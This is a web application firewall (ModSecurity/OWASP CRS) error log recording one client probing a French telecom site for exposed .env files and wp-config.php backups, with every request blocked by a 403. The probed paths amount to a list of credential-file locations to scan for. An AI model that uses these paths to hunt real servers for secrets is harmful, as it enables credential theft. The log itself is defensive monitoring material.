[Mon May 11 20:56:05.662121 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/stripe/.env"] [unique_id "agImRdeaRXe5lR8y0ZOTWgAAAVM"]
[Mon May 11 20:56:05.844556 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /user/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/user/.env"] [unique_id "agImRTP5Q_-MBliRCAxn9QAAABg"]
[Mon May 11 20:56:05.844713 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/user/.env"] [unique_id "agImRTP5Q_-MBliRCAxn9QAAABg"]
[Mon May 11 20:56:05.844883 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/user/.env"] [unique_id "agImRTP5Q_-MBliRCAxn9QAAABg"]
[Mon May 11 20:56:05.933021 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/v1/.env"] [unique_id "agImRTP5Q_-MBliRCAxn9wAAABg"]
[Mon May 11 20:56:05.933192 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/v1/.env"] [unique_id "agImRTP5Q_-MBliRCAxn9wAAABg"]
[Mon May 11 20:56:05.933372 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/v1/.env"] [unique_id "agImRTP5Q_-MBliRCAxn9wAAABg"]
[Mon May 11 20:56:06.228435 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stg/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/stg/.env"] [unique_id "agImRlNddpkriGUb6ZV3BgAAARg"]
[Mon May 11 20:56:06.228655 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/stg/.env"] [unique_id "agImRlNddpkriGUb6ZV3BgAAARg"]
[Mon May 11 20:56:06.228868 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/stg/.env"] [unique_id "agImRlNddpkriGUb6ZV3BgAAARg"]
[Mon May 11 20:56:06.508605 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/v2/.env"] [unique_id "agImRjP5Q_-MBliRCAxn_gAAABg"]
[Mon May 11 20:56:06.508772 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/v2/.env"] [unique_id "agImRjP5Q_-MBliRCAxn_gAAABg"]
[Mon May 11 20:56:06.508953 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/v2/.env"] [unique_id "agImRjP5Q_-MBliRCAxn_gAAABg"]
[Mon May 11 20:56:06.526497 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/var/www/.env"] [unique_id "agImRjP5Q_-MBliRCAxoAAAAABg"]
[Mon May 11 20:56:06.526667 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/var/www/.env"] [unique_id "agImRjP5Q_-MBliRCAxoAAAAABg"]
[Mon May 11 20:56:06.526841 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/var/www/.env"] [unique_id "agImRjP5Q_-MBliRCAxoAAAAABg"]
[Mon May 11 20:56:06.531694 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/var/www/html/.env"] [unique_id "agImRvjVc-A-CSptvm1x5AAAAFU"]
[Mon May 11 20:56:06.531852 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/var/www/html/.env"] [unique_id "agImRvjVc-A-CSptvm1x5AAAAFU"]
[Mon May 11 20:56:06.532034 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/var/www/html/.env"] [unique_id "agImRvjVc-A-CSptvm1x5AAAAFU"]
[Mon May 11 20:56:06.581238 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v3/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/v3/.env"] [unique_id "agImRvjVc-A-CSptvm1x5QAAAFU"]
[Mon May 11 20:56:06.581480 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/v3/.env"] [unique_id "agImRvjVc-A-CSptvm1x5QAAAFU"]
[Mon May 11 20:56:06.581708 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/v3/.env"] [unique_id "agImRvjVc-A-CSptvm1x5QAAAFU"]
[Mon May 11 20:56:06.592529 2026] [security2:error] [pid 1534836:tid 1534888] [client 195.178.110.199:47290] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/web/.env"] [unique_id "agImRteaRXe5lR8y0ZOTYAAAAVE"]
[Mon May 11 20:56:06.592729 2026] [security2:error] [pid 1534836:tid 1534888] [client 195.178.110.199:47290] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/web/.env"] [unique_id "agImRteaRXe5lR8y0ZOTYAAAAVE"]
[Mon May 11 20:56:06.593293 2026] [security2:error] [pid 1534836:tid 1534888] [client 195.178.110.199:47290] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/web/.env"] [unique_id "agImRteaRXe5lR8y0ZOTYAAAAVE"]
[Mon May 11 20:56:06.755558 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /website/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/website/.env"] [unique_id "agImRjP5Q_-MBliRCAxoBQAAABY"]
[Mon May 11 20:56:06.755778 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/website/.env"] [unique_id "agImRjP5Q_-MBliRCAxoBQAAABY"]
[Mon May 11 20:56:06.756011 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/website/.env"] [unique_id "agImRjP5Q_-MBliRCAxoBQAAABY"]
[Mon May 11 20:56:06.760645 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/wp-config.php"] [unique_id "agImRjP5Q_-MBliRCAxoBgAAABg"]
[Mon May 11 20:56:06.760794 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/wp-config.php"] [unique_id "agImRjP5Q_-MBliRCAxoBgAAABg"]
[Mon May 11 20:56:06.760966 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/wp-config.php"] [unique_id "agImRjP5Q_-MBliRCAxoBgAAABg"]
[Mon May 11 20:56:06.771644 2026] [security2:error] [pid 1516058:tid 1516100] [client 195.178.110.199:36156] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agImRiMeXtzav-mi9Syx_QAAAMo"]
[Mon May 11 20:56:06.771798 2026] [security2:error] [pid 1516058:tid 1516100] [client 195.178.110.199:36156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agImRiMeXtzav-mi9Syx_QAAAMo"]
[Mon May 11 20:56:06.771977 2026] [security2:error] [pid 1516058:tid 1516100] [client 195.178.110.199:36156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agImRiMeXtzav-mi9Syx_QAAAMo"]
[Mon May 11 20:56:06.773595 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.new"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/wp-config.php.new"] [unique_id "agImRjP5Q_-MBliRCAxoBwAAABY"]
[Mon May 11 20:56:06.773743 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/wp-config.php.new"] [unique_id "agImRjP5Q_-MBliRCAxoBwAAABY"]
[Mon May 11 20:56:06.773925 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/wp-config.php.new"] [unique_id "agImRjP5Q_-MBliRCAxoBwAAABY"]
[Mon May 11 20:56:06.778403 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/wp-config.php.old"] [unique_id "agImRjP5Q_-MBliRCAxoCAAAABg"]
[Mon May 11 20:56:06.778545 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/wp-config.php.old"] [unique_id "agImRjP5Q_-MBliRCAxoCAAAABg"]
[Mon May 11 20:56:06.778712 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/wp-config.php.old"] [unique_id "agImRjP5Q_-MBliRCAxoCAAAABg"]
